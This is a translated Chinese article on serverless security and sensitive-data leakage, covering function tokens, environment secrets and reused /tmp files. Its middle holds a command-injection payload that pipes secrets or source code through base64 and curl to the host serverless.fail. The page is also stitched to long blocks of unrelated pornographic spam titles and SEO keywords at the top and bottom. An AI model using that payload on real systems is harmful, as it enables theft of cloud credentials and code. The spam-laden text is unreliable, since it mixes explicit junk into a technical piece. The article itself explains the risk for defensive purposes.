精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

深入考察無服務器架構的安全威脅,敏感數據泄露

運維 服務器運維
我們都聽說過重大的數據泄露事件,比如最近的數據泄露——5000萬Facebook用戶數據遭到泄露。雖然隱私受到損害的通常是最終用戶,但公司的成本也是非常高昂的。在極端情況下,數據泄露甚至可能導致公司關門大吉。

 我們都聽說過重大的數據泄露事件,比如最近的數據泄露——5000萬Facebook用戶數據遭到泄露。雖然隱私受到損害的通常是最終用戶,但公司的成本也是非常高昂的。在極端情況下,數據泄露甚至可能導致公司關門大吉。

這方面最好的一個例子就是Code Spaces,一家前SaaS提供商,可以通過Amazon Elastic Compute Cloud的控制面板進行訪問。黑客“……刪除了所有EBS快照、S3存儲桶、所有AMI、許多EBS實例和多個機器實例”,最終導致了這家基于AWS的公司的倒閉。

[[255787]]


如果您自認為“嗯,這些我都知道。但是,對于無服務器架構來說,我最想知道事情到底有哪些不同呢?”,好吧,這說明你真是來對了地方。

實際上,針對Code Spaces的攻擊事件發生在2014年,那時,“無服務器”的概念還沒有出現。然而,其中的某些云服務和資源(例如S3 )卻是當今無服務器解決方案中的基本組成部分。如果在此基礎上再加入幾個函數,然后重新排列一些字母(我的意思是AMI→IAM,清楚了吧?),并添加一些由三個字母組成的縮寫(例如EFS、SQS、SES等),那么,它們面臨的風險其實是一樣的。如果數據沒有得到很好的保護,肯定會面臨巨大的風險。


現在,您可能會說“那又怎樣,即使面對同樣的攻擊,但是別忘了,我們還有許多其他的數據源”。是的,這句話也有一定的道理。但是,我們現在必須從不同的角度來全盤考慮。

首先,也許是更相似的一個方面,那就是對于數據的處理。我們必須為靜態和傳輸中的數據提供安全保護。

我們需要為云存儲、備份或數據庫中的敏感數據提供加密處理。我們的服務提供商通常會提供相應的工具,以幫助我們輕松、正確的完成這些任務。我們可以使用他們提供的KMS/Key Vault來安全地存儲數據。此外,我們還要確保資源配置的正確性,這樣就不會出現大的泄漏事故,至少不會引起公司倒閉。當然,一定要確保不要將密鑰泄漏到代碼存儲庫或任何其他可能最終落入攻擊者手中的地方。

對于傳輸中的數據,只需確保所有連接都使用了TLS(當我們調用提供商的服務時,這些都是其默認的設置)即可。

其次,也是最有趣的部分,那就是我們新的無服務器運行時環境中的數據。如果我們發現自己的/etc/passwd和/etc/shadow文件遭受了攻擊,我們會不會驚恐萬分?無論是在我們的服務器中,還是在云中(例如EC2),都是夠嚇人的。不過,在無服務器架構中,世道已經變了,這些已經不再敏感了。我甚至會考慮把它們直接交給攻擊者,如果他們的態度好一點的話。事實上,的確如此。

[[255788]]

 


這是為什么呢?因為,這些安全問題現在已經是服務提供商操心的事情了,并且,我們的函數是在通用環境中運行的。

 

那么,我們需要保護的到底是什么呢?這是最重要的問題。其實,答案很簡單,但對于不同的提供商來說,保護對象可能會有所不同。

A.我們的代碼

我們可能沒有服務器,但我們的代碼卻是存儲在云存儲或云存儲庫中的(當然,這些都不在我們的職責范圍內),并且,它們是隨函數的運行時環境一起提供的。當然,具體的存儲位置取決于運行時和供應商。

例如:在AWS NodeJS中,您可以在當前目錄(./)中找到自己的代碼,同時,還可在GCP中找到自己的Python代碼,這就與AWS上的位置有所不同(/var/task)。這些方面的知識,將留給讀者自己去探索?,F在,請使用以下GCP函數在任意文件或目錄中運行cat和ls命令。

  1. curl -X POST -H "Content-Type: application/json" https://us-east1-slsbot-214001.cloudfunctions.net/gcp-py-explore --data '{"ls":"./"}' | base64 --decode 
  2. curl -X POST -H "Content-Type: application/json" https://us-east1-slsbot-214001.cloudfunctions.net/gcp-py-explore --data '{"cat":"main.py"}' | base64 --decode 

B.我們的機密信息

同樣,這也隨服務供應商的不同而有所不同。但是,如果我們以AWS為例,那么您需要保護兩部分的機密信息。第一部分,屬于無法控制,卻又必須面對的信息,其中包含自己函數方面的信息,例如其內存配置、日志組名稱、版本,等等。但是,最重要的是函數的令牌(token)。

這些令牌代表著該函數相對于該帳戶的權限。因此,如果該函數對帳戶具有為所欲為的權限的話(大多數情況下都是這樣),比如掃描數據庫或編輯存儲桶這類的權限的話,那么,它們一旦落入攻擊者的手中,就會帶來巨大的災難。攻擊者甚至不必使用您的函數,只需用他們自己的計算機上的令牌,就能運行任意的aws cli命令,因為aws配置文件stolen_keys中存放有被盜令牌(AWS_ACCESS_KEY_ID、AWS_SECRET_ACCESS_KEY和AWS_SESSION_TOKEN):


無論我們喜歡與否,這些令牌都是存在的,所以,我們需要確保對函數的權限加以控制,只要能夠滿足完成它們的相應操作就可以了,最好多一點都不要給它們。如果函數需要從S3bucket讀取數據的話,務必確保只賦予該函數從特定bucket或任何相關資源讀取數據的權限。


我們要控制的部分是作為環境變量傳遞給函數的那些我們自己的機密信息。它們都應該通過同樣的方式訪問;通過代碼或系統進程調用它們。如果它們包含敏感信息,則應考慮對它們進行加密保護。這樣,系統進程將無法看到它們的實際值(請回顧一下env的屏幕截圖)。但是,如果該函數存在代碼注入漏洞,那么攻擊者則可以直接運行讀取其值的代碼。

  1. ENCRYPTED = os.environ['third_party_api_key'
  2. DECRYPTED = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext'

C.我們的文件

在無服務器環境中,除了/tmp文件夾之外,文件系統都應該是只讀的;/tmp文件夾是應用程序存放自身文件的位置(如果有的話)。讓我再次使用俺的通靈能力,來指出您現在的想法……無服務器的環境是不是臨時的,所有的文件都被刪除后,該函數執行完其代碼了嗎?嗯,這種想法并非完全錯誤,至少對了一部分,但并非絕對正確。只有當該函數保持空閑狀態一段時間(在AWS上大約為4分鐘)時,該函數的環境才會被完全刪除。但是,如果在該時間范圍內至少被調用一次,它很可能會進入與以前完全相同的環境中。當然,我們不敢打包票,但在這個時間內,通常會有一些事件出現。當然,這是出于性能的考慮。

如果您的函數是易受攻擊的,并且使用了包含敏感信息的文件,那么它的數據很可能會被攻擊者所竊取。為了演示其內在原理,不妨回顧一下前面給出的兩個curl命令。實際上,這兩個調用都會將數據(base64編碼)寫入/tmp/b64文件。

如果先運行“ls”調用的話,可以看到/out/b64文件的大小為252字節。但是,如果先運行“cat”調用,然后再運行ls命令的話,則會看到文件大小會有所不同,它會變為1496字節。這意味著“ls”調用的輸出結果顯示的是“cat”調用的輸出內容。當然,如果再次運行“ls”調用,看到的數字將是252,因為上一個調用是“ls”。

 

 

我們什么時候需要擔心這個安全問題呢?如果我們的代碼含有任何類型的代碼注入漏洞,那就要倍加小心了;不管問題出現在進程還是表達式api (例如eval )中,也無論到底是開發人員本身還是依賴庫造成的,攻擊者都可以訪問和/或修改我們的敏感數據。例如,假設我提供給您的函數帶有這種漏洞,比方說可以通過json值注入命令。那么,攻擊者只需:

  1. --data '{"ls":"/tmp; code=`$secret | base64 --wrap=0`; curl https://serverless.fail/leak?data=$code"}' 

 

其中$secret的值可以是“cat main.py”,這樣就可以獲取我們的代碼。其中,“env”,表示從環境變量中竊取令牌和機密信息。或者,“cat/tmp/leftover.file”,表示在/tmp文件夾下沒有提供安全保護措施的敏感文件。

我們已經試過了,對吧?上面的命令會輸出機密信息,將其編碼為base64形式,并將其發送到攻擊者指定的位置(例如serverless.fail)?,F在,他們要做的就是破解它,然后大干一場!這樣,您就有機會登上新聞頭版了……開個玩笑。

總而言之,我們該如何應對呢?下面,我們簡單總結一下:

  • 對于敏感數據,除非絕對必要,否則不要存儲。
  • 始終為靜態和傳輸過程中的敏感數據提供嚴格的保護措施。盡可能使用基礎架構供應商提供的加密和密鑰管理服務來存儲數據、機密信息和環境變量。· 避免在代碼存儲庫和任何其他共享位置存放密鑰。
  •  通過限制函數的權限來減小攻擊面。
  • 進行代碼審查和靜態分析,以找出代碼中的漏洞。
  • 監控依賴代碼庫的安全問題,以避免將已知漏洞引入我們自己的應用程序。
  • 使用完畢后,從/tmp中刪除相關的敏感文件。
責任編輯:武曉燕 來源: 4hou
相關推薦

2019-01-09 11:22:54

2020-09-09 11:21:35

網絡安全數據泄露漏洞

2023-10-23 10:39:05

2025-09-28 07:10:00

GenAI敏感數據安全

2013-09-12 13:23:06

2021-03-26 14:30:54

安全服務器架構的安全

2011-08-10 13:34:54

2024-11-05 17:35:21

2021-05-11 15:12:52

高敏感數據數據防泄露大數據

2019-03-18 15:36:32

無服務器FaasServerless

2021-09-18 10:06:06

數據安全隱私計算大數據

2020-11-26 15:09:49

數據安全百度地圖機器學習

2019-04-30 10:27:46

無服務器云計算安全

2018-01-23 08:07:06

2017-03-09 00:41:40

2023-07-17 17:58:45

2019-09-20 15:05:23

軟件數據庫硬件

2018-04-24 07:35:51

2023-08-04 23:49:09

2022-10-20 20:50:03

點贊
收藏

51CTO技術棧公眾號

在线观看亚洲专区| 国产欧美精品一区二区三区四区| 欧美国产激情18| 搡老熟女老女人一区二区| 97人人做人人爽香蕉精品| 亚洲视频在线一区观看| 激情伦成人综合小说| 一级久久久久久| 欧美精品大片| 在线精品国产成人综合| av在线网站免费观看| 范冰冰一级做a爰片久久毛片| 国产精品免费久久| 国产亚洲情侣一区二区无| 国产偷人爽久久久久久老妇app| 欧美不卡在线| 在线播放日韩专区| 最近日本中文字幕| 成人免费91| 欧美唯美清纯偷拍| 欧美女人性生活视频| 激情成人四房播| 久久久久久久久久美女| 99热在线播放| 国产一区二区女内射| 久久亚洲风情| 97av在线播放| 久久精品欧美一区二区| 999久久久国产精品| 亚洲女人天堂视频| 午夜男人的天堂| 亚洲2区在线| 欧美另类z0zxhd电影| 午夜精品在线免费观看| 小草在线视频免费播放| 亚洲无线码一区二区三区| 国产美女视频免费| 蜜桃视频在线观看www社区| 久久久综合激的五月天| 精品国产乱码久久久久软件 | 91大神福利视频| 色综合综合网| 亚洲欧美福利视频| 国产又黄又粗又猛又爽的视频 | 狠狠色狠狠色合久久伊人| 欧美专区在线观看| 日韩av大片在线观看| 在线不卡视频| 97碰在线观看| 中文字幕视频网| 亚洲欧美日韩在线观看a三区| 欧美猛交ⅹxxx乱大交视频| 国产精品精品软件男同| 99精品电影| 久久精品中文字幕电影| 国产黄色录像片| 亚洲国产老妈| 久久99热精品这里久久精品| 爱爱视频免费在线观看| 91精品蜜臀一区二区三区在线| 最近2019中文字幕一页二页| www.99re6| 亚洲先锋影音| 欧美情侣性视频| 国产精品成人免费一区二区视频| 在线不卡亚洲| 日韩女优在线播放| 欧美一级做a爰片免费视频| 免费在线看一区| 91精品久久久久久久久久另类 | 视频在线观看一区二区| 久久精品亚洲a| 欧美a级一区| 国内精品久久久久伊人av| 午夜影院在线看| 久久福利影视| 成人美女免费网站视频| 亚洲成人一级片| 99久久精品情趣| 日韩影院一区| 日本大胆在线观看| 色综合久久综合网97色综合| 免费看污污网站| 免费一区二区三区在线视频| 欧美精品一区二区蜜臀亚洲| 国产熟妇搡bbbb搡bbbb| 99re6这里只有精品| 九九久久综合网站| 五月婷婷激情视频| 韩国一区二区三区| 国严精品久久久久久亚洲影视| 精品三级久久久久久久电影聊斋| 中文一区在线播放| cao在线观看| www.一区| 亚洲国产精品成人va在线观看| 久久久久亚洲av无码a片| 亚洲天天影视网| 秋霞av国产精品一区| 国产精品女同一区二区| 99久久精品免费精品国产| 亚洲精品tv久久久久久久久| 青春草在线免费视频| 欧美性猛交xxxx乱大交极品| 天堂av.com| 国产91一区| 色综合91久久精品中文字幕| 亚洲天堂五月天| 国产白丝精品91爽爽久久| 色婷婷精品国产一区二区三区| 精品美女在线观看视频在线观看| 欧美性xxxxxx| 在线播放av网址| 99精品视频在线| 日韩美女av在线免费观看| 亚洲成人精品女人久久久| 中文字幕国产一区二区| 国产女大学生av| 亚洲精品一区二区三区中文字幕| 这里只有精品丝袜| 天天做天天爱夜夜爽| 国产白丝网站精品污在线入口| 一卡二卡3卡四卡高清精品视频| sm久久捆绑调教精品一区| 56国语精品自产拍在线观看| xxxx日本黄色| 亚洲视频播放| 国产在线精品一区| 色网在线观看| 日韩精品中午字幕| 欧美日韩中文字幕在线观看 | 91久久久久久久久| 国产免费a∨片在线观看不卡| 亚洲mv在线观看| 国内自拍偷拍视频| 欧美精品一卡| 91精品视频在线免费观看| 成人免费在线电影| 色婷婷久久久久swag精品| 可以直接看的无码av| 日韩午夜在线电影| 韩国成人一区| 高清视频在线观看三级| 亚洲福利视频久久| 国产精品第56页| av在线播放不卡| 亚洲国产精品久久久久婷蜜芽| 六月丁香久久丫| 91chinesevideo永久地址| 天堂在线中文网| 黑人巨大精品欧美一区二区免费| av无码av天天av天天爽| 香蕉国产精品偷在线观看不卡| 久久99精品久久久久久久久久| 波多野在线观看| 亚洲第一福利网| 久久亚洲天堂网| 欧美国产欧美亚州国产日韩mv天天看完整 | 精品久久久免费| 中文字幕 亚洲一区| 国产精品久久久久毛片大屁完整版| 韩国成人av| 免费污视频在线一区| 日韩中文在线观看| 国产福利视频导航| 亚洲电影激情视频网站| av在线网站观看| 久久久久久网| 一区二区三区我不卡| 日本精品在线播放| 91国产视频在线| 国产在线你懂得| 9191久久久久久久久久久| 国产一级大片在线观看| 91亚洲精品乱码久久久久久蜜桃| 日韩精品一区二区三区色欲av| 欧美亚洲国产激情| 97操在线视频| 亚洲综合电影| 久久夜色精品国产| 污视频在线免费观看| 欧美在线一区二区三区| 男人操女人的视频网站| av午夜一区麻豆| 超碰成人在线播放| 1024成人| 一区二区视频在线播放| 国产+成+人+亚洲欧洲在线| 国产91网红主播在线观看| av片在线观看永久免费| 日韩h在线观看| 一区二区三区精| 亚洲妇女屁股眼交7| 永久免费av无码网站性色av| 国产精品自拍网站| 91香蕉视频污版| 欧美特黄一区| 一区二区三区四区在线视频| 美女视频亚洲色图| 91丝袜美腿美女视频网站| 超碰aⅴ人人做人人爽欧美| 成年无码av片在线| 国产一二三在线观看| 亚洲精品一区二区三区香蕉| 一区精品在线观看| 欧美视频第一页| 久久网一区二区| 国产精品国产a级| 中国毛片在线观看| 成人在线综合网| 最新av免费在线观看| 性欧美videos另类喷潮| 今天免费高清在线观看国语| 成人高清电影网站| 久久国产精品99久久久久久丝袜| 成人亚洲精品| 国产精品视频xxx| 一个人www视频在线免费观看| 欧美床上激情在线观看| 拍真实国产伦偷精品| 亚洲欧美精品suv| 神马午夜在线观看| 精品少妇一区二区三区免费观看| 91美女精品网站| 欧美色网一区二区| 久草视频一区二区| 欧美日韩另类字幕中文| 日韩精品――中文字幕| 一区二区久久久| 日韩激情综合网| 日韩一区日韩二区| www.4hu95.com四虎| 久久精品在线免费观看| 麻豆国产精品一区| 2021中文字幕一区亚洲| 五月天激情小说| 成人激情午夜影院| 97人妻精品一区二区三区免费 | 久久国产手机看片| 国产在线播放精品| 国产一区二区自拍| 国产乱人伦精品一区| 国产二区一区| 黄色网一区二区| 极品日韩久久| 亚洲调教一区| 日本成人三级电影网站| 成人精品亚洲| 日韩欧美国产二区| 精品国产一区二区三区av片| 日韩精品一区二区三区四区五区| 国产一区二区三区四区| 五月天婷亚洲天综合网鲁鲁鲁| 欧美色图一区| 最新不卡av| 欧美二区视频| 免费看毛片的网址| 亚洲黄色毛片| 成人在线免费观看av| 亚洲一区二区三区免费在线观看| 亚洲精品中文字幕无码蜜桃| 日韩高清中文字幕一区| 日韩欧美国产片| 国产成人精品1024| 亚洲成av人片在线观看无| 久久精品视频一区| 侵犯稚嫩小箩莉h文系列小说| 亚洲一区二区美女| 一区二区三区福利视频| 欧美午夜精品在线| 在线亚洲欧美日韩| 日韩免费电影一区| 青青草超碰在线| 中文字幕成人精品久久不卡| 神马午夜伦理不卡 | 天天干天天色综合| 欧美日韩国产另类不卡| 亚洲国产精品久久久久爰性色| 日韩电影大全免费观看2023年上| www.在线播放| 欧美日韩国产999| 亚洲天堂资源| 成人有码在线播放| 日韩高清电影免费| 一区二区三区视频在线播放| 影音先锋中文字幕一区| 不卡av免费在线| 成人综合婷婷国产精品久久 | 我不卡伦不卡影院| 欧美视频在线免费播放| 蜜臀av一区二区| 漂亮人妻被黑人久久精品| 国产精品你懂的在线欣赏| 久艹视频在线观看| 91传媒视频在线播放| av网站在线免费看| 亚洲午夜精品久久久久久性色 | 色琪琪久久se色| 少妇人妻大乳在线视频| 琪琪一区二区三区| 免费黄色三级网站| 亚洲精品欧美在线| 国产精品成人无码| 亚洲国产精品va在线| 超碰最新在线| 国产精品久在线观看| 欧美sss在线视频| 黄色网络在线观看| 青娱乐精品在线视频| 五十路六十路七十路熟婆| 亚洲欧美日韩在线不卡| 中文在线资源天堂| 亚洲男女性事视频| segui88久久综合9999| 91最新在线免费观看| 日韩欧美二区| 男人靠女人免费视频网站| 成人一区在线观看| 91麻豆精品成人一区二区| 欧美综合色免费| 日本免费不卡| 97超碰国产精品女人人人爽| 亚洲国产一区二区三区网站| 久久久成人精品一区二区三区 | 亚洲国产精品第一区二区三区| 中文字幕22页| 国产精品污污网站在线观看| 波多野结衣啪啪| 亚洲欧美激情另类校园| 人人草在线视频| 久久精品国产99精品国产亚洲性色| 欧美日韩精品| 美女日批在线观看| 亚洲精品视频在线看| 精品国产乱码一区二区三| 久久久国产在线视频| 99er精品视频| 亚洲黄色网址在线观看| 精品一区二区三区影院在线午夜| 嘿嘿视频在线观看| 欧美专区亚洲专区| 中文字幕日本在线| 国产精品自产拍在线观看| 欧美国产一级| 中文字幕在线视频一区二区三区| 亚洲桃色在线一区| 精品久久久中文字幕人妻| 欧美高清视频在线| 日韩成人一级| 黄色高清无遮挡| 国产精品女上位| 国产美女三级无套内谢| 久久97久久97精品免视看| 999在线精品| 亚洲爆乳无码专区| 中文字幕免费观看一区| 国产又色又爽又黄又免费| 久久不射电影网| 操欧美女人视频| 波多野结衣家庭教师视频| 久久九九久久九九| 国产精品国产精品国产专区| 裸体女人亚洲精品一区| 亚洲精品一二三**| 日本wwww视频| 中文字幕在线免费不卡| а√中文在线资源库| 国外色69视频在线观看| 国产毛片一区二区三区 | 欧美经典影片视频网站| 日本丰满少妇xxxx| 国产亚洲成aⅴ人片在线观看 | 亚洲精品永久免费| 91国拍精品国产粉嫩亚洲一区| 亚洲av综合色区| 99久久国产免费看| 在线观看黄色网| 久久久久久久久久久91| 国产精品一在线观看| 捷克做爰xxxⅹ性视频| 亚洲国产色一区| 岛国大片在线观看| 99r国产精品视频| 视频一区视频二区中文字幕| 天天天天天天天天操| 精品亚洲国产视频| 99热这里有精品| www.四虎成人| 一区二区三区精品在线| 激情综合闲人网| 国产99午夜精品一区二区三区| 久久xxxx| 久久久久久久国产视频| 国产午夜精品全部视频播放| 欧美高清一级片| 亚洲欧美日韩一级| 欧美日韩国产在线看| av网址在线免费观看| 日韩精品伦理第一区| yourporn久久国产精品|